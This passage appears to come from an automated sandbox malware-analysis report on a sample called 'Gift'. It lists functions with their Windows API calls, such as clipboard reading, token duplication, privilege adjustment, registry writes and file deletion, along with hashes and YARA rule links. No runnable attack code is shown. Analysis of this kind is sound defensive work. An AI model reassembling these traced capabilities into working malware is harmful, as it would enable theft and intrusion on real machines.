                                                                          • API ID: _fseek
                                                                          • String ID:
                                                                          • API String ID: 2937370855-0
                                                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                          • Instruction ID: ffd4922a0e5d5561738f3296a0e464606ed920219c569c0827559566aa612faa
                                                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                          • Instruction Fuzzy Hash: 3AF08CB6410208BFDF159F45DC00CEBBB79EB85320F0041A8F9045A211D272EA219BA0
                                                                          Function 002E4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,?,?,002E27AF,?,00000001), ref: 002E4A63
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID:
                                                                          • API String ID: 3664257935-0
                                                                          • Opcode ID: a9c3403e75ace17b3d0be7da88e66fd8bb80dd34733fda08a74f6a977a701cee
                                                                          • Instruction ID: b7a84759fac18d02932a22c2e3f30c0f6f803f2bd329a74faae53ecdab0928e1
                                                                          • Opcode Fuzzy Hash: a9c3403e75ace17b3d0be7da88e66fd8bb80dd34733fda08a74f6a977a701cee
                                                                          • Instruction Fuzzy Hash: C2F085711A0752CFCB34AF26E4A0826BBF0AF043263A0893EE6D783710C37199A0CF04
                                                                          Function 00310A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 06fc47855e83f6d9ed195d9aa6ffba673d15fc94ed66c3bbafef9c30f14fad95
                                                                          • Instruction ID: 0a5737d1f9808c7ccfc03370fc9225aeeeb471d3e7e62ae7d88f3b04559741fa
                                                                          • Opcode Fuzzy Hash: 06fc47855e83f6d9ed195d9aa6ffba673d15fc94ed66c3bbafef9c30f14fad95
                                                                          • Instruction Fuzzy Hash: FCE0E5716182469AE73AAB689404762FBD8AB04310F10442AD49581741E7F59CE49BA2
                                                                          Function 002E4AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock
                                                                          • String ID:
                                                                          • API String ID: 2638373210-0
                                                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                          • Instruction ID: 2605d4a2764c0a2e293e33bb4adc45b2fd6baa81576ea888bbf82538fd648cde
                                                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                          • Instruction Fuzzy Hash: D4F0587240020DFFDF05CF80C941EAABB79FF04314F208189F9198A212D332DA61AB90
                                                                          Function 002F09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002F09E4
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LongNamePath_memmove
                                                                          • String ID:
                                                                          • API String ID: 2514874351-0
                                                                          • Opcode ID: 9c7f21a87ca6eb2b8e9fdc88ee42a7f87315163fd37749be00a726c37d86c5ce
                                                                          • Instruction ID: b7ef89b77f5a8a9dfb596ebb609b1731c9e8136a2eaa20fb6fd68ac95283e46a
                                                                          • Opcode Fuzzy Hash: 9c7f21a87ca6eb2b8e9fdc88ee42a7f87315163fd37749be00a726c37d86c5ce
                                                                          • Instruction Fuzzy Hash: C5E0863690012857C721E6989C16FEA77DDDB89791F0441B6FC0CD7344DA609C918691
                                                                          Function 00334FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,00333BFE), ref: 00334FED
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 3aab31029552edf9b1f171cb197b285aaceac6f383754b4e5d52989b6f5e596f
                                                                          • Instruction ID: 8d2ffbae8595d41d367ed18f2bcd77d3c15000da2236d649c7c09c9196f6ac96
                                                                          • Opcode Fuzzy Hash: 3aab31029552edf9b1f171cb197b285aaceac6f383754b4e5d52989b6f5e596f
                                                                          • Instruction Fuzzy Hash: E2B09238000700579D2A1F3C198909A334558433A9FDE1B81E478854E29279A84BA520
                                                                          Function 002F547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                          • Instruction ID: b9e97823afca8564ff51108c8146ee898e130a540ccd03d76c03fd75020ea4f1
                                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                          • Instruction Fuzzy Hash: 73B0927644020C77CE012E82EC03A697F29AB406A8F408020FB0C1C162A673E6B09A89
                                                                          Function 0033C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00334005: FindFirstFileW.KERNEL32(?,?), ref: 0033407C
                                                                            • Part of subcall function 00334005: DeleteFileW.KERNEL32(?,?,?,?), ref: 003340CC
                                                                            • Part of subcall function 00334005: FindNextFileW.KERNEL32(00000000,00000010), ref: 003340DD
                                                                            • Part of subcall function 00334005: FindClose.KERNEL32(00000000), ref: 003340F4
                                                                          • GetLastError.KERNEL32 ref: 0033C292
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                          • String ID:
                                                                          • API String ID: 2191629493-0
                                                                          • Opcode ID: 0f1fc5ff3e439e90906c85e2aba2e6c32288f5b7b08488d98a547af709f39831
                                                                          • Instruction ID: fbd05c1139cdaa5b95b3158712f26df5e3dd55582a0b545c557252dc32d82d89
                                                                          • Opcode Fuzzy Hash: 0f1fc5ff3e439e90906c85e2aba2e6c32288f5b7b08488d98a547af709f39831
                                                                          • Instruction Fuzzy Hash: 90F08C322206108FCB15EF99D885B6AB7E9AF88320F05845AF9499B352CB74BC11CB94

                                                                          Non-executed Functions

                                                                          Function 0035D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0035D208
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035D249
                                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0035D28E
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035D2B8
                                                                          • SendMessageW.USER32 ref: 0035D2E1
                                                                          • _wcsncpy.LIBCMT ref: 0035D359
                                                                          • GetKeyState.USER32(00000011), ref: 0035D37A
                                                                          • GetKeyState.USER32(00000009), ref: 0035D387
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035D39D
                                                                          • GetKeyState.USER32(00000010), ref: 0035D3A7
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035D3D0
                                                                          • SendMessageW.USER32 ref: 0035D3F7
                                                                          • SendMessageW.USER32(?,00001030,?,0035B9BA), ref: 0035D4FD
                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0035D513
                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0035D526
                                                                          • SetCapture.USER32(?), ref: 0035D52F
                                                                          • ClientToScreen.USER32(?,?), ref: 0035D594
                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0035D5A1
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0035D5BB
                                                                          • ReleaseCapture.USER32 ref: 0035D5C6
                                                                          • GetCursorPos.USER32(?), ref: 0035D600
                                                                          • ScreenToClient.USER32(?,?), ref: 0035D60D
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0035D669
                                                                          • SendMessageW.USER32 ref: 0035D697
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0035D6D4
                                                                          • SendMessageW.USER32 ref: 0035D703
                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0035D724
                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0035D733
                                                                          • GetCursorPos.USER32(?), ref: 0035D753
                                                                          • ScreenToClient.USER32(?,?), ref: 0035D760
                                                                          • GetParent.USER32(?), ref: 0035D780
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0035D7E9
                                                                          • SendMessageW.USER32 ref: 0035D81A
                                                                          • ClientToScreen.USER32(?,?), ref: 0035D878
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0035D8A8
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0035D8D2
                                                                          • SendMessageW.USER32 ref: 0035D8F5
                                                                          • ClientToScreen.USER32(?,?), ref: 0035D947
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0035D97B
                                                                            • Part of subcall function 002D29AB: GetWindowLongW.USER32(?,000000EB), ref: 002D29BC
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0035DA17
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F
                                                                          • API String ID: 3977979337-4164748364
                                                                          • Opcode ID: d5500ad2cbb3d6a75a84ec5028c853b10abef7beeaeb4e81928ccea6701131ac
                                                                          • Instruction ID: 29583f3cbada883795a4d8c21f962dcc61a99f62ae5ef414508904325e5f3d13
                                                                          • Opcode Fuzzy Hash: d5500ad2cbb3d6a75a84ec5028c853b10abef7beeaeb4e81928ccea6701131ac
                                                                          • Instruction Fuzzy Hash: BC42BF342082419FD736DF28C848FAABBE9FF49311F150519FA958B2B1C7B1D958CB62
                                                                          Function 00328F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00329399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003293E3
                                                                            • Part of subcall function 00329399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00329410
                                                                            • Part of subcall function 00329399: GetLastError.KERNEL32 ref: 0032941D
                                                                          • _memset.LIBCMT ref: 00328F71
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00328FC3
                                                                          • CloseHandle.KERNEL32(?), ref: 00328FD4
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00328FEB
                                                                          • GetProcessWindowStation.USER32 ref: 00329004
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 0032900E
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00329028
                                                                            • Part of subcall function 00328DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00328F27), ref: 00328DFE
                                                                            • Part of subcall function 00328DE9: CloseHandle.KERNEL32(?,?,00328F27), ref: 00328E10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                          • String ID: $default$winsta0
                                                                          • API String ID: 2063423040-1027155976
                                                                          • Opcode ID: 207e138caca147a13bcd83d5505c46316350a799d95182197fd30fb57b84f13c
                                                                          • Instruction ID: 47a094aec3d40efd1f9d0e85f409bc13d8a2873a94729c8abed33e98a12a4b33
                                                                          • Opcode Fuzzy Hash: 207e138caca147a13bcd83d5505c46316350a799d95182197fd30fb57b84f13c
                                                                          • Instruction Fuzzy Hash: B9818B71900219BFDF129FA5EC49AEEBB79EF04304F05816AF910A6260DB719E25DB20
                                                                          Function 00344632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenClipboard.USER32(00360980), ref: 0034465C
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0034466A
                                                                          • GetClipboardData.USER32(0000000D), ref: 00344672
                                                                          • CloseClipboard.USER32 ref: 0034467E
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0034469A
                                                                          • CloseClipboard.USER32 ref: 003446A4
                                                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 003446B9
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 003446C6
                                                                          • GetClipboardData.USER32(00000001), ref: 003446CE
                                                                          • GlobalLock.KERNEL32(00000000), ref: 003446DB
                                                                          • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 0034470F
                                                                          • CloseClipboard.USER32 ref: 0034481F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                          • String ID:
                                                                          • API String ID: 3222323430-0
                                                                          • Opcode ID: b7856e9e7cf40aa9874188b057972bfd6a2f8c09379b3970c87ddf8959fde8ad
                                                                          • Instruction ID: ab4895a86c7cc044af9a17637dc89fce852807c1f5537f720b0d191e5144e26c
                                                                          • Opcode Fuzzy Hash: b7856e9e7cf40aa9874188b057972bfd6a2f8c09379b3970c87ddf8959fde8ad
                                                                          • Instruction Fuzzy Hash: 90519E31244241ABD306EF60DC9AF6F77ECAF84B40F014929F556DA1E1DFB0E9158B62
                                                                          Function 0033F5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0033F5F9
                                                                          • _wcscmp.LIBCMT ref: 0033F60E
                                                                          • _wcscmp.LIBCMT ref: 0033F625
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0033F637
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0033F651
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0033F669
                                                                          • FindClose.KERNEL32(00000000), ref: 0033F674
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0033F690
                                                                          • _wcscmp.LIBCMT ref: 0033F6B7
                                                                          • _wcscmp.LIBCMT ref: 0033F6CE
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0033F6E0
                                                                          • SetCurrentDirectoryW.KERNEL32(0038B578), ref: 0033F6FE
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0033F708
                                                                          • FindClose.KERNEL32(00000000), ref: 0033F715
                                                                          • FindClose.KERNEL32(00000000), ref: 0033F727
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*$S3
                                                                          • API String ID: 1803514871-1003266494
                                                                          • Opcode ID: 3639de116e9f88e81b505dcf04a896fe8510707064b35b4b98b8bb1f51810044
                                                                          • Instruction ID: 396c7fd765bad967069613bbe3295ed11a06d8c8d474cdee0cb4d8010e73a49e
                                                                          • Opcode Fuzzy Hash: 3639de116e9f88e81b505dcf04a896fe8510707064b35b4b98b8bb1f51810044
                                                                          • Instruction Fuzzy Hash: 3A31F671A0020E6FDB16EFB4DC8AAEFB7AC9F09361F5041A5F804D20A0DB70CA44CB60
                                                                          Function 0033CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0033CDD0
                                                                          • FindClose.KERNEL32(00000000), ref: 0033CE24
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0033CE49
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0033CE60
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0033CE87
                                                                          • __swprintf.LIBCMT ref: 0033CED3
                                                                          • __swprintf.LIBCMT ref: 0033CF16
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • __swprintf.LIBCMT ref: 0033CF6A
                                                                            • Part of subcall function 002F38C8: __woutput_l.LIBCMT ref: 002F3921
                                                                          • __swprintf.LIBCMT ref: 0033CFB8
                                                                            • Part of subcall function 002F38C8: __flsbuf.LIBCMT ref: 002F3943
                                                                            • Part of subcall function 002F38C8: __flsbuf.LIBCMT ref: 002F395B
                                                                          • __swprintf.LIBCMT ref: 0033D007
                                                                          • __swprintf.LIBCMT ref: 0033D056
                                                                          • __swprintf.LIBCMT ref: 0033D0A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 3953360268-2428617273
                                                                          • Opcode ID: 78f3a88b787321114274acf94e73396a5ca51d854e743b1c094d4e0916753a45
                                                                          • Instruction ID: 37cd999fc66ba1102229c7c70fff772505ac8650ea5c90fa2b8e91f97a466c59
                                                                          • Opcode Fuzzy Hash: 78f3a88b787321114274acf94e73396a5ca51d854e743b1c094d4e0916753a45
                                                                          • Instruction Fuzzy Hash: 6FA15AB1414304ABD711FFA4C896DAFB7ECAF94700F40092AF595C2291EB70EE18CB62
                                                                          Function 00350EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00350FB3
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00360980,00000000,?,00000000,?,?), ref: 00351021
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00351069
                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003510F2
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00351412
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0035141F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
